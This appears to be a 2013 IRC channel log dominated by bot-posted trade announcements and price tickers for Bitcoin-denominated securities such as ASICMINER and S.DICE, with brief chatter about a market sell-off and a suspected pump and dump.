18:24:21 [HAVELOCK] [ASICM] 5 @ 0.02637999 = 0.1319 BTC [+] Jun 13 18:26:40 [BTCTC] [ASICMINER-PT] 1 @ 2.624999 BTC [+] Jun 13 18:27:15 [BTCTC] [S.DICE-PT] 100 @ 0.002899 = 0.2899 BTC [+] Jun 13 18:27:53 [BTCTC] [S.DICE-PT] 941 @ 0.002899 = 2.728 BTC [+] Jun 13 18:29:48 [BTCTC] [ASICMINER-PT] 9 @ 2.624999 = 23.625 BTC [+] Jun 13 18:29:52 [BTCTC] [ASICMINER-PT] 10 @ 2.625 = 26.25 BTC [+] Jun 13 18:29:56 [BTCTC] [DMS.PURCHASE] 46 @ 0.066163 = 3.0435 BTC [-] Jun 13 18:40:29 [BTCTC] [BTC-BOND] 8 @ 0.009994 = 0.08 BTC [+] Jun 13 18:43:35 https://bitcointalk.org/index.php?topic=5441.msg2463941#msg2463941 Jun 13 18:47:01 [HAVELOCK] [ASICM] 80 @ 0.02637999 = 2.1104 BTC [+] Jun 13 18:47:54 [BTCTC] [ASICMINER-PT] 1 @ 2.649 BTC [+] Jun 13 18:48:47 [BTCTC] [TAT.ASICMINER] 4 @ 0.0262 = 0.1048 BTC [-] Jun 13 18:48:48 [BTCTC] [ASICMINER-PT] 1 @ 2.649 BTC [+] Jun 13 18:48:50 [BTCTC] [TAT.ASICMINER] 34 @ 0.0263 = 0.8942 BTC [+] **** BEGIN LOGGING AT Fri Jun 14 03:24:59 2013 Jun 14 03:26:20 [BTCTC] [ASICMINER-PT] 1 @ 2.600999 BTC [+] Jun 14 03:26:25 [BTCTC] [TAT.VIRTUALMINE] 40 @ 0.007 = 0.28 BTC [+] Jun 14 03:27:56 [BTCTC] [ASICMINER-PT] 1 @ 2.601 BTC [+] Jun 14 03:29:17 [BTCTC] [ASICMINER-PT] 1 @ 2.61 BTC [+] Jun 14 03:30:14 [BTCTC] [ASICMINER-PT] 1 @ 2.645 BTC [+] Jun 14 03:30:17 [BTCTC] [ASICMINER-PT] 2 @ 2.646 = 5.292 BTC [+] Jun 14 03:32:26 [BTCTC] [DMS.PURCHASE] 400 @ 0.066256 = 26.5024 BTC [+] Jun 14 03:37:40 [MPEX] [S.MPOE] 5400 @ 0.0007108 = 3.8383 BTC [+] Jun 14 03:37:40 (file "/pyenv/coinflow27/local/lib/python2.7/site-packages/django/db/backends/postgresql_psycopg2/base.py", line 54, in execute) Jun 14 03:37:48 [MPEX] [S.MPOE] 69 @ 0.0007104 = 0.049 BTC [-] Jun 14 03:37:48 (file "/pyenv/coinflow27/local/lib/python2.7/site-packages/django/db/backends/postgresql_psycopg2/base.py", line 54, in execute) Jun 14 03:37:48 [MPEX] [S.MPOE] 4321 @ 0.00070998 = 3.0678 BTC [-] Jun 14 03:37:50 (file "/pyenv/coinflow27/local/lib/python2.7/site-packages/django/db/backends/postgresql_psycopg2/base.py", line 54, in execute) Jun 14 03:37:59 Whoops Jun 14 03:38:01 Sorry Jun 14 03:38:04 [MPEX] [S.MPOE] 13600 @ 0.00070997 = 9.6556 BTC [-] Jun 14 03:44:24 [BTCTC] [ASICMINER-PT] 1 @ 2.647 BTC [+] Jun 14 03:47:25 [BTCTC] [GSDPT] 5 @ 0.0025 = 0.0125 BTC [-] Jun 14 03:49:59 He should behave better now when discovering an unfamiliar exchange Jun 14 03:50:14 [BTCTC] [ASICMINER-PT] 1 @ 2.647 BTC [+] Jun 14 03:50:16 [BTCTC] [ASICMINER-PT] 1 @ 2.648 BTC [+] Jun 14 03:50:40 [BTCTC] [ASICMINER-PT] 1 @ 2.64998 BTC [+] Jun 14 03:54:07 [BTCTC] [TAT.ASICMINER] 40 @ 0.026699 = 1.068 BTC [+] Jun 14 03:54:11 [BTCTC] [ASICMINER-PT] 2 @ 2.6799 = 5.3598 BTC [+] Jun 14 03:54:29 [BTCTC] [ASICMINER-PT] 1 @ 2.68 BTC [+] Jun 14 03:54:42 !ticker m s.dicer Jun 14 03:54:43 [BTCTC] [ASICMINER-PT] 1 @ 2.683 BTC [+] Jun 14 03:54:44 !ticker m s.dice Jun 14 03:54:44 You know, I've had it up to here with this Indian malarkey. Jun 14 03:54:45 [MPEX:S.DICE] 1D: 0.00180009 / 0.00199571 / 0.002 (1021974 shares, 2,039.57 BTC), 7D: 0.00180009 / 0.00200049 / 0.00249793 (2054182 shares, 4,109.37 BTC), 30D: 0.00135 / 0.00201041 / 0.00296096 (2319168 shares, 4,662.50 BTC) Jun 14 03:54:53 heh Jun 14 03:54:58 [BTCTC] [ASICMINER-PT] 1 @ 2.685 BTC [+] Jun 14 03:55:45 ArgoBit: I'm good at seeing bottoms, once they develop. Jun 14 03:55:48 Heh Jun 14 03:56:56 [MPEX] [S.MPOE] 7100 @ 0.00070898 = 5.0338 BTC [-] Jun 14 03:56:58 [MPEX] [S.MPOE] 12350 @ 0.00070978 = 8.7658 BTC [+] Jun 14 03:58:19 [HAVELOCK] [ASICM] 22 @ 0.02687996 = 0.5914 BTC [-] Jun 14 03:58:27 im good at seducing chicks once they're naked in my bed Jun 14 04:03:42 [HAVELOCK] [ASICM] 60 @ 0.026 = 1.56 BTC [-] Jun 14 04:03:43 [HAVELOCK] [ASICM] 10 @ 0.026 = 0.26 BTC [-] Jun 14 04:04:07 thats the hard part, right Jun 14 04:08:56 I am a CPA in Maryland with over 20 years of experience in the financial industires. Jun 14 04:08:56 I have extensive knowledge of Bitcoin, TOR and data encryption. Jun 14 04:10:03 [BTCTC] [TAT.ASICMINER] 12 @ 0.026113 = 0.3134 BTC [-] Jun 14 04:10:41 [BTCTC] [DMS.MINING] 10 @ 0.030679 = 0.3068 BTC [+] Jun 14 04:13:48 [MPEX] [S.MPOE] 3000 @ 0.00070888 = 2.1266 BTC [-] Jun 14 04:13:50 [MPEX] [S.MPOE] 7450 @ 0.00070885 = 5.2809 BTC [-] Jun 14 04:18:17 ;;ticker Jun 14 04:18:23 BTCUSD ticker | Best bid: 101.98824, Best ask: 101.99000, Bid-ask spread: 0.00176, Last trade: 101.99000, 24 hour volume: 31332.01349379, 24 hour low: 100.30000, 24 hour high: 110.30000, 24 hour vwap: 105.00578 Jun 14 04:19:05 [BTCTC] [S.DICE-PT] 1 @ 0.002849 BTC [+] Jun 14 04:23:25 [BTCTC] [S.MPOE-PT] 1 @ 0.000702 BTC [-] Jun 14 04:23:39 [BTCTC] [DMS.SELLING] 37 @ 0.0379 = 1.4023 BTC [-] Jun 14 04:23:45 [BTCTC] [DMS.SELLING] 20 @ 0.038 = 0.76 BTC [+] Jun 14 04:25:06 [BTCTC] [BITVPS] 5 @ 0.000709 = 0.0035 BTC [+] Jun 14 04:26:14 [BTCTC] [DMS.MINING] 7 @ 0.02999 = 0.2099 BTC [-] Jun 14 04:27:26 [BTCTC] [DMS.PURCHASE] 50 @ 0.066256 = 3.3128 BTC [+] Jun 14 04:29:02 [BTCTC] [DMS.MINING] 4 @ 0.02999 = 0.12 BTC [-] Jun 14 04:31:52 [BTCTC] [ASICMINER-PT] 10 @ 2.699999 = 27 BTC [+] Jun 14 04:46:51 [BTCTC] [DMS.MINING] 139 @ 0.02999 = 4.1686 BTC [-] Jun 14 04:47:56 [BTCTC] [ESECURITYSABTC] 1 @ 0.268 BTC [+] Jun 14 04:48:04 [BTCTC] [TAT.ASICMINER] 12 @ 0.026999 = 0.324 BTC [+] Jun 14 04:50:41 [BTCTC] [GSDPT] 1 @ 0.002724 BTC [+] Jun 14 04:51:50 [MPEX] [S.MPOE] 15620 @ 0.00070969 = 11.0854 BTC [+] Jun 14 04:56:59 [HAVELOCK] [HIM] 3 @ 0.293 = 0.879 BTC [-] Jun 14 05:00:00 [HAVELOCK] [ASICM] 5 @ 0.0261 = 0.1305 BTC [+] Jun 14 05:02:37 [HAVELOCK] [ASICM] 3 @ 0.026 = 0.078 BTC [-] Jun 14 05:02:37 [HAVELOCK] [ASICM] 8 @ 0.026 = 0.208 BTC [-] Jun 14 05:04:15 [BTCTC] [ESECURITYSABTC] 1 @ 0.19101 BTC [-] Jun 14 05:04:31 [HAVELOCK] [ASICM] 23 @ 0.025822 = 0.5939 BTC [-] Jun 14 05:06:20 [HAVELOCK] [ASICM] 11 @ 0.02582101 = 0.284 BTC [-] Jun 14 05:06:59 [HAVELOCK] [ASICM] 40 @ 0.02582101 = 1.0328 BTC [-] Jun 14 05:08:21 [BTCTC] [ASICMINER-PT] 1 @ 2.699999 BTC [+] Jun 14 05:08:29 [BTCTC] [DMS.SELLING] 18 @ 0.0375 = 0.675 BTC [-] Jun 14 05:08:50 [BTCTC] [ASICMINER-PT] 1 @ 2.699999 BTC [+] Jun 14 05:10:56 [BTCTC] [DMS.PURCHASE] 200 @ 0.066256 = 13.2512 BTC [+] Jun 14 05:11:53 [HAVELOCK] [ASICM] 242 @ 0.02582101 = 6.2487 BTC [-] Jun 14 05:12:24 [HAVELOCK] [HIM] 5 @ 0.293 = 1.465 BTC [-] Jun 14 05:12:49 [HAVELOCK] [SDICE] 6 @ 0.192 = 1.152 BTC [+] Jun 14 05:12:49 [HAVELOCK] [SDICE] 3 @ 0.19 = 0.57 BTC [-] Jun 14 05:12:51 [HAVELOCK] [SDICE] 9 @ 0.183 = 1.647 BTC [-] Jun 14 05:13:22 [HAVELOCK] [ASICM] 5 @ 0.026878 = 0.1344 BTC [+] Jun 14 05:13:26 [BTCTC] [S.DICE-PT] 39 @ 0.00284 = 0.1108 BTC [-] Jun 14 05:14:32 [BTCTC] [TAT.ASICMINER] 12 @ 0.026123 = 0.3135 BTC [-] Jun 14 05:14:38 [BTCTC] [TAT.ASICMINER] 1 @ 0.026123 BTC [-] Jun 14 05:14:45 [BTCTC] [ASICMINER-PT] 1 @ 2.699999 BTC [+] Jun 14 05:15:37 [BTCTC] [TAT.ASICMINER] 4 @ 0.026123 = 0.1045 BTC [-] Jun 14 05:15:41 [BTCTC] [ASICMINER-PT] 10 @ 2.73 = 27.3 BTC [+] Jun 14 05:15:43 [BTCTC] [ASICMINER-PT] 1 @ 2.73 BTC [+] Jun 14 05:15:44 [BTCTC] [ASICMINER-PT] 11 @ 2.73 = 30.03 BTC [+] Jun 14 05:16:31 [HAVELOCK] [HIM] 5 @ 0.293 = 1.465 BTC [-] Jun 14 05:17:26 [BTCTC] [TAT.ASICMINER] 2 @ 0.026123 = 0.0522 BTC [-] Jun 14 05:17:46 [BTCTC] [ASICMINER-PT] 1 @ 2.732 BTC [+] Jun 14 05:18:00 [BTCTC] [ASICMINER-PT] 3 @ 2.73 = 8.19 BTC [-] Jun 14 05:22:25 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.007 = 0.035 BTC [+] Jun 14 05:24:39 [BTCTC] [BTC-BOND] 30 @ 0.009991 = 0.2997 BTC [-] Jun 14 05:26:24 [BTCTC] [DMS.PURCHASE] 5 @ 0.066256 = 0.3313 BTC [+] Jun 14 05:27:16 [HAVELOCK] [ASICM] 100 @ 0.0261 = 2.61 BTC [-] Jun 14 05:29:38 [HAVELOCK] [ASICM] 1 @ 0.02687799 BTC [+] Jun 14 05:37:15 [HAVELOCK] [ASICM] 6 @ 0.025822 = 0.1549 BTC [-] Jun 14 05:37:59 [BTCTC] [TAT.ASICMINER] 12 @ 0.026998 = 0.324 BTC [+] Jun 14 05:40:45 [BTCTC] [LTC-MINING] 1 @ 0.38 BTC [-] Jun 14 05:45:47 [BTCTC] [PAJKA.BOND] 5 @ 0.087999 = 0.44 BTC [+] Jun 14 05:50:13 [BTCTC] [TAT.ASICMINER] 7 @ 0.026999 = 0.189 BTC [+] Jun 14 05:51:17 [BTCTC] [PAJKA.BOND] 2 @ 0.087999 = 0.176 BTC [+] Jun 14 05:52:14 [BTCTC] [TAT.ASICMINER] 1 @ 0.026999 BTC [+] Jun 14 05:53:38 [HAVELOCK] [ASICM] 200 @ 0.026 = 5.2 BTC [+] Jun 14 05:56:20 [HAVELOCK] [ASICM] 200 @ 0.026 = 5.2 BTC [+] Jun 14 05:56:40 [MPEX] [S.MPOE] 1080 @ 0.00070969 = 0.7665 BTC [+] Jun 14 05:56:42 [MPEX] [S.MPOE] 2319 @ 0.00071207 = 1.6513 BTC [+] Jun 14 05:57:19 [BTCTC] [S.DICE-PT] 61 @ 0.00284 = 0.1732 BTC [-] Jun 14 06:00:14 [BTCTC] [DMS.MINING] 100 @ 0.02999 = 2.999 BTC [-] Jun 14 06:01:06 [BTCTC] [TAT.ASICMINER] 1 @ 0.026999 BTC [+] Jun 14 06:01:09 [BTCTC] [TAT.ASICMINER] 4 @ 0.027 = 0.108 BTC [+] Jun 14 06:02:23 [BTCTC] [TAT.ASICMINER] 1 @ 0.027 BTC [+] Jun 14 06:02:47 [MPEX] [S.MPOE] 2002 @ 0.00071207 = 1.4256 BTC [+] Jun 14 06:02:48 [MPEX] [S.MPOE] 7998 @ 0.00071208 = 5.6952 BTC [+] Jun 14 06:10:04 [BTCTC] [ASICMINER-PT] 1 @ 2.73 BTC [-] Jun 14 06:10:19 [BTCTC] [ASICMINER-PT] 2 @ 2.738 = 5.476 BTC [+] Jun 14 06:10:29 [BTCTC] [ASICMINER-PT] 1 @ 2.739 BTC [+] Jun 14 06:10:35 [BTCTC] [ASICMINER-PT] 3 @ 2.74 = 8.22 BTC [+] Jun 14 06:12:17 [BTCTC] [TAT.ASICMINER] 20 @ 0.027 = 0.54 BTC [+] Jun 14 06:13:59 [BTCTC] [LTC-MINING] 1 @ 0.414 BTC [+] Jun 14 06:15:00 [BTCTC] [S.DICE-PT] 10 @ 0.00284 = 0.0284 BTC [-] Jun 14 06:17:06 [HAVELOCK] [ASICM] 7 @ 0.02600001 = 0.182 BTC [+] Jun 14 06:17:07 [HAVELOCK] [ASICM] 146 @ 0.026 = 3.796 BTC [-] Jun 14 06:17:53 [BTCTC] [ASICMINER-PT] 1 @ 2.7399 BTC [-] Jun 14 06:18:32 [BTCTC] [ASICMINER-PT] 3 @ 2.74 = 8.22 BTC [+] Jun 14 06:22:49 [BTCTC] [GSDPT] 100 @ 0.002724 = 0.2724 BTC [+] Jun 14 06:23:26 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.007 = 0.021 BTC [+] Jun 14 06:27:11 [BTCTC] [BITVPS] 1 @ 0.000709 BTC [+] Jun 14 06:30:36 [BTCTC] [S.MPOE-PT] 100 @ 0.000702 = 0.0702 BTC [-] Jun 14 06:33:23 [BTCTC] [ASICMINER-PT] 5 @ 2.74 = 13.7 BTC [+] Jun 14 06:33:27 [BTCTC] [ASICMINER-PT] 1 @ 2.74 BTC [+] Jun 14 06:34:09 [BTCTC] [ASICMINER-PT] 2 @ 2.75 = 5.5 BTC [+] Jun 14 06:34:22 [BTCTC] [ASICMINER-PT] 1 @ 2.75 BTC [+] Jun 14 06:39:08 [BTCTC] [ASICMINER-PT] 6 @ 2.75 = 16.5 BTC [+] Jun 14 06:44:12 [BTCTC] [ASICMINER-PT] 5 @ 2.75 = 13.75 BTC [+] Jun 14 06:44:56 [HAVELOCK] [ASICM] 7 @ 0.02684899 = 0.1879 BTC [+] Jun 14 06:45:08 [HAVELOCK] [ASICM] 24 @ 0.026849 = 0.6444 BTC [+] Jun 14 06:45:19 [HAVELOCK] [ASICM] 29 @ 0.02687996 = 0.7795 BTC [+] Jun 14 06:45:35 [HAVELOCK] [ASICM] 100 @ 0.02688999 = 2.689 BTC [+] Jun 14 06:45:49 [HAVELOCK] [ASICM] 5 @ 0.02689 = 0.1345 BTC [+] Jun 14 06:45:51 [BTCTC] [S.DICE-PT] 100 @ 0.00284 = 0.284 BTC [-] Jun 14 06:45:53 [HAVELOCK] [ASICM] 5 @ 0.026948 = 0.1347 BTC [+] Jun 14 06:45:59 [HAVELOCK] [ASICM] 12 @ 0.026949 = 0.3234 BTC [+] Jun 14 06:46:05 [HAVELOCK] [ASICM] 3 @ 0.02698999 = 0.081 BTC [+] Jun 14 06:46:10 [HAVELOCK] [ASICM] 5 @ 0.02699 = 0.135 BTC [+] Jun 14 06:46:14 [HAVELOCK] [ASICM] 1 @ 0.02699 BTC [+] Jun 14 06:46:40 [HAVELOCK] [ASICM] 150 @ 0.02699888 = 4.0498 BTC [+] Jun 14 06:46:42 [BTCTC] [S.DICE-PT] 90 @ 0.00284 = 0.2556 BTC [-] Jun 14 06:47:17 [HAVELOCK] [ASICM] 8 @ 0.02699888 = 0.216 BTC [+] Jun 14 06:48:11 [BTCTC] [TAT.ASICMINER] 12 @ 0.027 = 0.324 BTC [+] Jun 14 06:50:13 [HAVELOCK] [ASICM] 42 @ 0.02699888 = 1.134 BTC [+] Jun 14 06:50:15 [HAVELOCK] [ASICM] 47 @ 0.026999 = 1.269 BTC [+] Jun 14 06:50:16 [HAVELOCK] [ASICM] 15 @ 0.026999 = 0.405 BTC [+] Jun 14 06:53:38 [BTCTC] [ASICMINER-PT] 8 @ 2.75 = 22 BTC [+] Jun 14 06:53:43 [BTCTC] [ASICMINER-PT] 2 @ 2.75 = 5.5 BTC [+] Jun 14 06:55:13 [BTCTC] [DMS.MINING] 25 @ 0.03 = 0.75 BTC [+] Jun 14 06:55:56 [BTCTC] [DMS.PURCHASE] 37 @ 0.066256 = 2.4515 BTC [+] Jun 14 06:56:00 [BTCTC] [TAT.ASICMINER] 7 @ 0.027 = 0.189 BTC [+] Jun 14 06:56:25 [MPEX] [S.MPOE] 5000 @ 0.00070933 = 3.5467 BTC [-] Jun 14 06:56:26 [MPEX] [S.MPOE] 2890 @ 0.00070886 = 2.0486 BTC [-] Jun 14 06:57:15 [BTCTC] [TAT.ASICMINER] 20 @ 0.027 = 0.54 BTC [+] Jun 14 06:57:46 [BTCTC] [ASICMINER-PT] 18 @ 2.75 = 49.5 BTC [+] Jun 14 06:59:29 [BTCTC] [ESECURITYSABTC] 1 @ 0.268 BTC [+] Jun 14 07:01:22 [BTCTC] [TAT.ASICMINER] 1 @ 0.02749 BTC [+] Jun 14 07:03:24 ;;ticker Jun 14 07:03:24 BTCUSD ticker | Best bid: 99.86040, Best ask: 99.90000, Bid-ask spread: 0.03960, Last trade: 99.90000, 24 hour volume: 34737.10828117, 24 hour low: 99.30000, 24 hour high: 110.30000, 24 hour vwap: 104.33519 Jun 14 07:03:27 3K sell-off. Jun 14 07:03:42 ...there goes my pension fund. Jun 14 07:04:12 [BTCTC] [TAT.ASICMINER] 18 @ 0.02749 = 0.4948 BTC [+] Jun 14 07:04:21 lolwut Jun 14 07:07:38 [HAVELOCK] [HIM] 5 @ 0.295 = 1.475 BTC [+] Jun 14 07:08:05 [MPEX] [S.BBET] 6100 @ 0.000795 = 4.8495 BTC [-] Jun 14 07:10:04 [MPEX] [S.MPOE] 2424 @ 0.00071208 = 1.7261 BTC [+] Jun 14 07:10:14 [MPEX] [S.MPOE] 9176 @ 0.00071587 = 6.5688 BTC [+] Jun 14 07:14:11 [BTCTC] [ASICMINER-PT] 1 @ 2.78 BTC [+] Jun 14 07:14:56 [BTCTC] [TAT.ASICMINER] 15 @ 0.02749 = 0.4124 BTC [+] Jun 14 07:20:57 [BTCTC] [ASICMINER-PT] 2 @ 2.7 = 5.4 BTC [-] Jun 14 07:27:31 [BTCTC] [ASICMINER-PT] 1 @ 2.680001 BTC [-] Jun 14 07:27:33 [BTCTC] [ASICMINER-PT] 1 @ 2.68 BTC [-] Jun 14 07:30:02 [HAVELOCK] [ASICM] 396 @ 0.026999 = 10.6916 BTC [+] Jun 14 07:30:03 [HAVELOCK] [ASICM] 301 @ 0.027 = 8.127 BTC [+] Jun 14 07:30:19 [BTCTC] [ASICMINER-PT] 1 @ 2.779999 BTC [+] Jun 14 07:30:22 [BTCTC] [ASICMINER-PT] 2 @ 2.78 = 5.56 BTC [+] Jun 14 07:30:26 [BTCTC] [ASICMINER-PT] 1 @ 2.78 BTC [+] Jun 14 07:31:03 [BTCTC] [TAT.ASICMINER] 5 @ 0.02749 = 0.1375 BTC [+] Jun 14 07:31:48 [BTCTC] [ASICMINER-PT] 1 @ 2.79 BTC [+] Jun 14 07:32:11 [BTCTC] [ASICMINER-PT] 3 @ 2.79 = 8.37 BTC [+] Jun 14 07:32:33 going sky high Jun 14 07:33:13 [BTCTC] [DMS.MINING] 1 @ 0.03 BTC [+] Jun 14 07:33:28 [BTCTC] [ASICMINER-PT] 2 @ 2.7 = 5.4 BTC [-] Jun 14 07:37:06 [HAVELOCK] [ASICM] 21 @ 0.027 = 0.567 BTC [+] Jun 14 07:37:13 Wow Jun 14 07:37:35 Someone's absolutely desperate to dump BTC today Jun 14 07:38:21 [BTCTC] [ASICMINER-PT] 2 @ 2.79 = 5.58 BTC [+] Jun 14 07:38:23 [BTCTC] [ASICMINER-PT] 10 @ 2.798 = 27.98 BTC [+] Jun 14 07:38:24 [BTCTC] [ASICMINER-PT] 1 @ 2.680001 BTC [-] Jun 14 07:38:25 [BTCTC] [ASICMINER-PT] 1 @ 2.68 BTC [-] Jun 14 07:39:22 [BTCTC] [ASICMINER-PT] 12 @ 2.798 = 33.576 BTC [+] Jun 14 07:39:30 [HAVELOCK] [ASICM] 38 @ 0.02650001 = 1.007 BTC [-] Jun 14 07:42:04 looks like someone has started a serious pump and dump on am Jun 14 07:46:23 [BTCTC] [DMS.MINING] 49 @ 0.02961 = 1.4509 BTC [-] Jun 14 07:46:30 [BTCTC] [DMS.MINING] 61 @ 0.0295 = 1.7995 BTC [-] Jun 14 07:49:08 [BTCTC] [ASICMINER-PT] 1 @ 2.797979 BTC [-] Jun 14 07:49:12 [BTCTC] [ASICMINER-PT] 1 @ 2.79798 BTC [+] Jun 14 07:52:37 [HAVELOCK] [SDICE] 10 @ 0.205 = 2.05 BTC [+] Jun 14 07:56:21 inhies: Where's the pumping? Jun 14 07:57:25 its all around us Jun 14 07:59:10 I don't see much dumping :) Jun 14 08:01:06 [BTCTC] [ASICMINER-PT] 1 @ 2.79799 BTC [+] Jun 14 08:17:21 [BTCTC] [TAT.VIRTUALMINE] 33 @ 0.007 = 0.231 BTC [+] Jun 14 08:20:42 [BTCTC] [S.DICE-PT] 10 @ 0.00284 = 0.0284 BTC [-] Jun 14 08:21:23 [BTCTC] [S.DICE-PT] 10 @ 0.002841 = 0.0284 BTC [+] Jun 14 08:21:38 [BTCTC] [S.DICE-PT] 1 @ 0.002841 BTC [+] Jun 14 08:22:12 [BTCTC] [S.DICE-PT] 25 @ 0.002889 = 0.0722 BTC [+] Jun 14 08:25:30 [HAVELOCK] [ASICM] 282 @ 0.02671001 = 7.5322 BTC [+] Jun 14 08:36:56 [BTCTC] [TAT.ASICMINER] 32 @ 0.027013 = 0.8644 BTC [-] Jun 14 08:37:31 [BTCTC] [TAT.ASICMINER] 11 @ 0.0275 = 0.3025 BTC [+] Jun 14 08:38:54 [BTCTC] [TAT.ASICMINER] 13 @ 0.0275 = 0.3575 BTC [+] Jun 14 08:41:28 [BTCTC] [TAT.ASICMINER] 1 @ 0.0275 BTC [+] Jun 14 08:43:21 [HAVELOCK] [SDICE] 15 @ 0.205 = 3.075 BTC [+] Jun 14 08:44:20 [BTCTC] [RSM] 1 @ 0.01399 BTC [+] Jun 14 08:49:29 [HAVELOCK] [HIM] 8 @ 0.2935 = 2.348 BTC [-] Jun 14 08:56:06 [HAVELOCK] [ASICM] 465 @ 0.027 = 12.555 BTC [+] Jun 14 08:56:17 [HAVELOCK] [ASICM] 105 @ 0.027 = 2.835 BTC [+] Jun 14 08:59:17 [BTCTC] [TAT.ASICMINER] 16 @ 0.027997 = 0.448 BTC [+] Jun 14 08:59:27 [BTCTC] [COGNITIVE] 1 @ 0.3 BTC [+] Jun 14 09:01:52 [HAVELOCK] [ASICM] 10 @ 0.027 = 0.27 BTC [+] Jun 14 09:07:31 [BTCTC] [ASICMINER-PT] 2 @ 2.795 = 5.59 BTC [-] Jun 14 09:07:33 [BTCTC] [ASICMINER-PT] 8 @ 2.796997 = 22.376 BTC [+] Jun 14 09:08:34 [BTCTC] [ASICMINER-PT] 1 @ 2.797998 BTC [+] Jun 14 09:08:35 [BTCTC] [ASICMINER-PT] 5 @ 2.797999 = 13.99 BTC [+] Jun 14 09:08:42 [BTCTC] [ASICMINER-PT] 15 @ 2.797999 = 41.97 BTC [+] Jun 14 09:08:54 [BTCTC] [ASICMINER-PT] 9 @ 2.799 = 25.191 BTC [+] Jun 14 09:10:22 [BTCTC] [ASICMINER-PT] 1 @ 2.799 BTC [+] Jun 14 09:10:26 [BTCTC] [ASICMINER-PT] 2 @ 2.7998 = 5.5996 BTC [+] Jun 14 09:10:32 [BTCTC] [ASICMINER-PT] 2 @ 2.8 = 5.6 BTC [+] Jun 14 09:11:35 [BTCTC] [TAT.ASICMINER] 15 @ 0.027996 = 0.4199 BTC [-] Jun 14 09:12:38 [HAVELOCK] [ASICM] 56 @ 0.027 = 1.512 BTC [+] Jun 14 09:13:44 [BTCTC] [ASICMINER-PT] 11 @ 2.8 = 30.8 BTC [+] Jun 14 09:13:58 [BTCTC] [TAT.ASICMINER] 3 @ 0.027996 = 0.084 BTC [-] Jun 14 09:14:11 [HAVELOCK] [ASICM] 1 @ 0.027 BTC [+] Jun 14 09:14:21 [HAVELOCK] [ASICM] 1 @ 0.027 BTC [+] Jun 14 09:14:23 [BTCTC] [S.MPOE-PT] 79 @ 0.000702 = 0.0555 BTC [-] Jun 14 09:14:26 [HAVELOCK] [ASICM] 2 @ 0.02650016 = 0.053 BTC [-] Jun 14 09:14:27 [HAVELOCK] [ASICM] 18 @ 0.02650015 = 0.477 BTC [-] Jun 14 09:15:42 [MPEX] [S.DICE] 6000 @ 0.00180012 = 10.8007 BTC [+] Jun 14 09:16:00 [MPEX] [S.DICE] 1000 @ 0.00180011 = 1.8001 BTC [-] Jun 14 09:16:02 [MPEX] [S.DICE] 2000 @ 0.0018001 = 3.6002 BTC [-] Jun 14 09:16:03 [MPEX] [S.DICE] 9026 @ 0.00180009 = 16.2476 BTC [-] Jun 14 09:16:06 [MPEX] [S.DICE] 1000 @ 0.00180007 = 1.8001 BTC [-] Jun 14 09:16:12 [MPEX] [S.DICE] 1000 @ 0.00180001 = 1.8 BTC [-] Jun 14 09:16:14 [MPEX] [S.DICE] 313011 @ 0.0018 = 563.4198 BTC [-] Jun 14 09:17:24 [BTCTC] [S.DICE-PT] 94 @ 0.00289 = 0.2717 BTC [+] Jun 14 09:17:31 [BTCTC] [TAT.ASICMINER] 70 @ 0.027996 = 1.9597 BTC [-] Jun 14 09:17:38 [BTCTC] [S.DICE-PT] 76 @ 0.0029 = 0.2204 BTC [+] Jun 14 09:19:55 [BTCTC] [ASICMINER-PT] 21 @ 2.78 = 58.38 BTC [-] Jun 14 09:19:58 [BTCTC] [ASICMINER-PT] 4 @ 2.799999 = 11.2 BTC [+] Jun 14 09:21:16 [BTCTC] [ASICMINER-PT] 5 @ 2.8 = 14 BTC [+] Jun 14 09:21:18 [BTCTC] [ASICMINER-PT] 23 @ 2.8 = 64.4 BTC [+] Jun 14 09:21:29 [BTCTC] [TAT.ASICMINER] 1 @ 0.027995 BTC [-] Jun 14 09:25:07 [HAVELOCK] [ASICM] 18 @ 0.027 = 0.486 BTC [+] Jun 14 09:25:09 [BTCTC] [ASICMINER-PT] 1 @ 2.8 BTC [+] Jun 14 09:29:57 [BTCTC] [ASICMINER-PT] 9 @ 2.8 = 25.2 BTC [+] Jun 14 09:30:43 [BTCTC] [TAT.ASICMINER] 3 @ 0.027995 = 0.084 BTC [-] Jun 14 09:31:51 [BTCTC] [ASICMINER-PT] 7 @ 2.8 = 19.6 BTC [+] Jun 14 09:32:46 [BTCTC] [MININGCO.ETF] 1 @ 0.8 BTC [-] Jun 14 09:36:22 [BTCTC] [ASICMINER-PT] 1 @ 2.849 BTC [+] Jun 14 09:36:49 [BTCTC] [ASICMINER-PT] 1 @ 2.849 BTC [+] Jun 14 09:37:30 [BTCTC] [ASICMINER-PT] 9 @ 2.85 = 25.65 BTC [+] **** BEGIN LOGGING AT Fri Jun 14 16:37:55 2013 Jun 14 16:38:21 [BTCTC] [TAT.ASICMINER] 2 @ 0.0295 = 0.059 BTC [+] Jun 14 16:38:23 [BTCTC] [TAT.ASICMINER] 19 @ 0.0295 = 0.5605 BTC [+] Jun 14 16:39:11 [BTCTC] [ASICMINER-PT] 1 @ 2.898 BTC [+] Jun 14 16:39:26 [BTCTC] [ASICMINER-PT] 2 @ 2.899 = 5.798 BTC [+] Jun 14 16:40:06 [BTCTC] [ASICMINER-PT] 13 @ 2.899 = 37.687 BTC [+] Jun 14 16:40:55 [BTCTC] [TAT.ASICMINER] 9 @ 0.0295 = 0.2655 BTC [+] Jun 14 16:41:17 [BTCTC] [ASICMINER-PT] 2 @ 2.8989 = 5.7978 BTC [-] Jun 14 16:43:08 [BTCTC] [TAT.VIRTUALMINE] 140 @ 0.007 = 0.98 BTC [+] Jun 14 16:44:05 [HAVELOCK] [ASICM] 134 @ 0.0297 = 3.9798 BTC [+] Jun 14 16:47:07 [BTCTC] [TAT.ASICMINER] 1 @ 0.0295 BTC [+] Jun 14 16:47:08 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.007 BTC [+] Jun 14 16:47:41 [BTCTC] [TAT.ASICMINER] 4 @ 0.029 = 0.116 BTC [-] Jun 14 16:47:58 [HAVELOCK] [HIM] 3 @ 0.2988 = 0.8964 BTC [+] Jun 14 16:48:41 [HAVELOCK] [ASICM] 4 @ 0.0297 = 0.1188 BTC [+] Jun 14 16:50:12 [HAVELOCK] [ASICM] 35 @ 0.0297 = 1.0395 BTC [+] Jun 14 16:50:59 [HAVELOCK] [ASICM] 18 @ 0.0297 = 0.5346 BTC [+] Jun 14 16:52:50 [BTCTC] [DMS.SELLING] 50 @ 0.037 = 1.85 BTC [-] Jun 14 16:54:15 [BTCTC] [DMS.PURCHASE] 100 @ 0.066256 = 6.6256 